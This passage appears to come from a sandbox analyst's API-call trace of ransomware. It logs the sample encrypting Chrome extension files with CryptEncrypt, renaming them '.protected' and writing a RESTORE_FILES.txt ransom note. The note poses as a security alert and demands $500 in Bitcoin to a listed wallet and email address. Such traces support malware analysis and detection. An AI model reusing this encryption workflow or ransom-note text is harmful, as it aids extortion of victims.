lpNewFilePointer=0xffffffff) returned 1 [0079.758] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.759] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.759] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.759] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.759] CloseHandle (hObject=0x168) returned 1 [0079.759] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.protected") returned 167 [0079.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.protected")) returned 1 [0079.759] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.759] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.759] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\RESTORE_FILES.txt") returned 161 [0079.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.760] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.760] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.761] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.761] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.761] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.761] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.761] CloseHandle (hObject=0x164) returned 1 [0079.761] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.761] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0079.761] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0079.761] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0079.761] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0079.761] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0079.761] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he") returned 143 [0079.761] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0079.761] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0079.761] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*") returned 145 [0079.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.761] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.761] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.761] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.761] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.761] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.761] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\.") returned 145 [0079.761] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.761] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.762] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.762] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.762] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\..") returned 146 [0079.762] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.762] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.762] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.762] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.762] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.762] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.762] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.762] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.763] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.763] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.763] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.763] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.763] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.763] CloseHandle (hObject=0x168) returned 1 [0079.764] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.protected") returned 167 [0079.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.protected")) returned 1 [0079.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.764] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.764] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\RESTORE_FILES.txt") returned 161 [0079.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.765] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.765] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.765] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.765] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.766] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.766] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.766] CloseHandle (hObject=0x164) returned 1 [0079.766] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0079.766] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi") returned 143 [0079.766] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0079.766] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0079.766] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*") returned 145 [0079.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.767] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.767] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.767] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.767] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.767] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\.") returned 145 [0079.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.767] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.767] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.767] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.767] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.767] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.767] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\..") returned 146 [0079.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.767] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.767] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.767] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.767] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.767] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.768] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.768] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.768] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.768] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.769] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.769] 